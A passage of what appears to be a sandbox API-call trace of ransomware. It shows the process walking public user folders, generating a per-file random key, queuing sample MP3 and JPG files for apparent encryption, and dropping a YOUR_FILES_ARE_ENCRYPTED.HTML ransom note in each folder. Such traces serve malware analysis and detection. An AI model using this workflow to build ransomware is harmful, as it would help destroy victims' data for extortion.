ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0171.577] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\desktop.ini") returned 50 [0171.577] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.577] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.577] lstrlenW (lpString=".ini") returned 4 [0171.577] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.577] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3") returned 50 [0171.577] lstrcmpW (lpString1="Kalimba.mp3", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.577] PathFindExtensionW (pszPath="Kalimba.mp3") returned=".mp3" [0171.577] lstrlenW (lpString=".mp3") returned 4 [0171.577] PathFindExtensionW (pszPath="Kalimba.mp3") returned=".mp3" [0171.577] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.577] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x600 [0171.578] GetFileSizeEx (in: hFile=0x600, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=8414449) returned 1 [0171.578] GetProcessHeap () returned 0x270000 [0171.578] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7759008 [0171.581] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="D5") returned 2 [0171.581] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="ED") returned 2 [0171.581] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="DD") returned 2 [0171.581] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="41") returned 2 [0171.581] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="70") returned 2 [0171.581] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="18") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="85") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="59") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="24") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="ED") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="1B") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="33") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="98") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="43") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="56") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="D9") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="3C") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="82") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="95") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="F6") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="25") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="96") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="E6") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="4F") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="8F") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="56") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="FF") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="C3") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="53") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="E9") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="9D") returned 2 [0171.582] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="52") returned 2 [0171.583] lstrcpyW (in: lpString1=0x77690bc, lpString2="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3") returned="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" [0171.583] CreateIoCompletionPort (FileHandle=0x600, ExistingCompletionPort=0x3a0, CompletionKey=0x7759008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0171.583] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7759008, lpOverlapped=0x7759008) returned 1 [0171.583] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5119f42, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1d2df02, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe1d54062, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x3ec5d2, dwReserved0=0x0, dwReserved1=0x60, cFileName="Maid with the Flaxen Hair.mp3", cAlternateFileName="MAIDWI~1.MP3")) returned 1 [0171.583] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3") returned 68 [0171.583] lstrcmpW (lpString1="Maid with the Flaxen Hair.mp3", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.583] PathFindExtensionW (pszPath="Maid with the Flaxen Hair.mp3") returned=".mp3" [0171.583] lstrlenW (lpString=".mp3") returned 4 [0171.583] PathFindExtensionW (pszPath="Maid with the Flaxen Hair.mp3") returned=".mp3" [0171.583] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.583] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5fc [0171.584] GetFileSizeEx (in: hFile=0x5fc, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=4113874) returned 1 [0171.584] GetProcessHeap () returned 0x270000 [0171.584] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75aa008 [0171.587] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="D4") returned 2 [0171.587] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="3B") returned 2 [0171.587] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="AE") returned 2 [0171.587] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="33") returned 2 [0171.587] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="5E") returned 2 [0171.587] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="D8") returned 2 [0171.587] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="49") returned 2 [0171.587] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="6E") returned 2 [0171.587] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="3A") returned 2 [0171.587] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="B6") returned 2 [0171.588] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="E5") returned 2 [0171.588] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="AF") returned 2 [0171.588] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="2E") returned 2 [0171.588] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="66") returned 2 [0171.588] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="29") returned 2 [0171.588] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="39") returned 2 [0171.588] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="46") returned 2 [0171.588] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="BB") returned 2 [0171.588] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="36") returned 2 [0171.588] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="C1") returned 2 [0171.588] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="BD") returned 2 [0171.588] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="64") returned 2 [0171.588] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="71") returned 2 [0171.588] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="CD") returned 2 [0171.588] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="83") returned 2 [0171.588] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="8B") returned 2 [0171.588] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="59") returned 2 [0171.588] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="29") returned 2 [0171.588] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="F7") returned 2 [0171.588] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="C5") returned 2 [0171.588] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="55") returned 2 [0171.588] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="1B") returned 2 [0171.589] lstrcpyW (in: lpString1=0x75ba0bc, lpString2="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3") returned="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3" [0171.589] CreateIoCompletionPort (FileHandle=0x5fc, ExistingCompletionPort=0x3a0, CompletionKey=0x75aa008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0171.589] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75aa008, lpOverlapped=0x75aa008) returned 1 [0171.589] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5119f42, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1d07da2, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe1d2df02, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x49e459, dwReserved0=0x0, dwReserved1=0x60, cFileName="Sleep Away.mp3", cAlternateFileName="SLEEPA~1.MP3")) returned 1 [0171.589] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3") returned 53 [0171.589] lstrcmpW (lpString1="Sleep Away.mp3", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.589] PathFindExtensionW (pszPath="Sleep Away.mp3") returned=".mp3" [0171.589] lstrlenW (lpString=".mp3") returned 4 [0171.589] PathFindExtensionW (pszPath="Sleep Away.mp3") returned=".mp3" [0171.589] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.589] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0171.590] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=4842585) returned 1 [0171.590] GetProcessHeap () returned 0x270000 [0171.590] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0171.593] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="BB") returned 2 [0171.593] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="0A") returned 2 [0171.593] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="01") returned 2 [0171.593] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="8A") returned 2 [0171.593] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="1F") returned 2 [0171.593] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="6A") returned 2 [0171.593] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="4D") returned 2 [0171.593] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="C5") returned 2 [0171.593] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="35") returned 2 [0171.594] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="6C") returned 2 [0171.594] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="8A") returned 2 [0171.594] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="1F") returned 2 [0171.594] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="FC") returned 2 [0171.594] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="CB") returned 2 [0171.594] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="4D") returned 2 [0171.594] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="3D") returned 2 [0171.594] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="14") returned 2 [0171.594] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="BD") returned 2 [0171.594] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="67") returned 2 [0171.594] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="F2") returned 2 [0171.594] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="6E") returned 2 [0171.594] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="D4") returned 2 [0171.594] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="69") returned 2 [0171.594] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="B9") returned 2 [0171.594] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="15") returned 2 [0171.594] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="4C") returned 2 [0171.594] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="60") returned 2 [0171.594] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="10") returned 2 [0171.594] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="61") returned 2 [0171.594] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="01") returned 2 [0171.594] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="0F") returned 2 [0171.594] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="50") returned 2 [0171.595] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3") returned="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3" [0171.595] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0171.595] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0171.595] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5119f42, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1d07da2, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe1d2df02, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x49e459, dwReserved0=0x0, dwReserved1=0x60, cFileName="Sleep Away.mp3", cAlternateFileName="SLEEPA~1.MP3")) returned 0 [0171.595] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0171.595] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 68 [0171.595] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\public\\music\\sample music\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f8 [0171.595] WriteFile (in: hFile=0x5f8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0171.598] CloseHandle (hObject=0x5f8) returned 1 [0171.598] GetProcessHeap () returned 0x270000 [0171.598] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0171.598] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe5119f42, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0x6b61335c, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Sample Music", cAlternateFileName="SAMPLE~1")) returned 0 [0171.599] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0171.599] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 55 [0171.599] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\public\\music\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0171.599] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0171.601] CloseHandle (hObject=0x5a0) returned 1 [0171.601] GetProcessHeap () returned 0x270000 [0171.602] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.602] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6b38bbf8, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b38bbf8, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Pictures", cAlternateFileName="")) returned 1 [0171.602] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures") returned 28 [0171.602] GetProcessHeap () returned 0x270000 [0171.602] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74081a0 [0171.603] lstrcpyW (in: lpString1=0x74081a0, lpString2="\\\\?\\C:\\Users\\Public\\Pictures" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures") returned="\\\\?\\C:\\Users\\Public\\Pictures" [0171.603] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Pictures", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\*") returned="\\\\?\\C:\\Users\\Public\\Pictures\\*" [0171.603] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6b38bbf8, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b38bbf8, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0171.603] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6b38bbf8, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b38bbf8, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.603] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6b38bbf8, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0x6b38bbf8, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b3b1d58, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.603] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\desktop.ini") returned 40 [0171.603] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.603] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.603] lstrlenW (lpString=".ini") returned 4 [0171.603] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.603] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe5119f42, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0x6b3d7eb8, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Sample Pictures", cAlternateFileName="SAMPLE~1")) returned 1 [0171.603] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures") returned 44 [0171.603] GetProcessHeap () returned 0x270000 [0171.603] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.603] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures" [0171.603] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\*") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\*" [0171.603] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe5119f42, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0x6b3d7eb8, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0171.634] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe5119f42, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0x6b3d7eb8, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.634] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5119f42, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe1d07da2, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe1d07da2, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0xd6b22, dwReserved0=0x0, dwReserved1=0x60, cFileName="Chrysanthemum.jpg", cAlternateFileName="CHRYSA~1.JPG")) returned 1 [0171.634] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg") returned 62 [0171.634] lstrcmpW (lpString1="Chrysanthemum.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.634] PathFindExtensionW (pszPath="Chrysanthemum.jpg") returned=".jpg" [0171.634] lstrlenW (lpString=".jpg") returned 4 [0171.635] PathFindExtensionW (pszPath="Chrysanthemum.jpg") returned=".jpg" [0171.635] SystemFunction036 